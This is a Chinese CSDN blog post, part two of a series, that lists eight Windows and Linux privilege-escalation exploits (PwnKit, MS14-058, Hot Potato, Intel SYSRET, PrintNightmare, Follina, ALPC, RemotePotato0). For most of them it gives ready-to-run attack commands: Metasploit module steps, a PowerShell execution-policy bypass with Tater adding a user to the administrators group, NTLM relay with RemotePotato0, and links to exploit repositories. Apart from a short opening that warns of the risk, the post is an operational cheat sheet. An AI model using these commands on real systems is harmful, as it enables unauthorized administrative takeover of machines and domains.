百种提权及手段一览系列第2集

本文详细介绍了8种常见的Windows系统权限升级漏洞,包括PwnKit、ms14_058、HotPotato等,强调了识别和防止这些漏洞对于保障网络安全的重要性。
摘要由CSDN通过智能技术生成

特权升级的危险是显而易见的。通过提升权限,攻击者可以绕过网络安全措施,从而损害数据完整性、机密性和系统可用性。对于组织而言,这可能会导致数据泄露、系统停机以及潜在的法律和声誉后果。识别权限升级的迹象并部署预防性网络安全措施对于保护数字资产并确保只有授权人员才能访问关键系统功能至关重要。
在这里插入图片描述

主要有两种类型:垂直升级和水平升级。在垂直升级中,具有较低级别权限的攻击者将其权限提升到较高级别用户(通常是管理员)的权限。这使得他们能够访问受限区域、修改系统配置,甚至部署恶意软件。另一方面,横向升级涉及访问属于对等用户的资源或功能,并利用类似特权帐户的权限。

本期整理了8种热门提权方式,请查收哟:
1.PwnKit
域:No
Local Admin: Yes
操作系统: Linux
类型: 0/1 Exploit
方法:
./cve-2021-4034
Whoami;id
批注:https://github.com/berdav/CVE-2021-4034

2.ms14_058
域:No
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
msf > use exploit/windows/local/ms14_058_track_popup_menu
msf exploit(ms14_058_track_popup_menu) > set TARGET < target-id >
msf exploit(ms14_058_track_popup_menu) > exploit

3.Hot Potato
域:No
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
命令提示符下: powershell.exe -nop -ep bypass
在Power Shell提示符类型输入: Import-Module C:\Users\User\Desktop\Tools\Tater\Tater.ps1
在Power Shell提示符类型输入: Invoke-Tater -Trigger 1 -Command “net localgroup administrators user /add”
要确认攻击是否成功,请在 Power Shell 提示符中键入: net localgroup administrators
批注:https://github.com/Kevin-Robertson/Tater

4.Intel SYSRET
域:No
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
execute -H -f sysret.exe -a “-pid [pid]”
批注:https://github.com/jajp777/sysret
release版本:https://github.com/jajp777/sysret/tree/master/x64/Release
5.PrintNightmare
域:Yes
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
https://github.com/outflanknl/PrintNightmare
PrintNightmare 10.10.10.10 exp.dll

6.Folina
域名: Y/N
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
https://github.com/JohnHammond/msdt-follina
python3 follina.py -c “notepad”

7.ALPC
域名: Y/N
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
https://github.com/riparino/Task_Scheduler_ALPC
8.RemotePotato0
域名: Y/N
Local Admin: Yes
操作系统: Windows
类型: 0/1 Exploit
方法:
sudo ntlmrelayx.py -t ldap://10.0.0.10 –no-wcf-server –escalate-user normal_user
.\RemotePotato0.exe -m 0 -r 10.0.0.20 -x 10.0.0.20 -p 9999 -s 1
批注:
ntlmrelayx.py只找到个很相似的:https://github.com/LuemmelSec/ntlmrelayx.py_to_exe
remotepotato:https://github.com/antonioCoco/RemotePotato0/releases/tag/1.2

  • 9
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值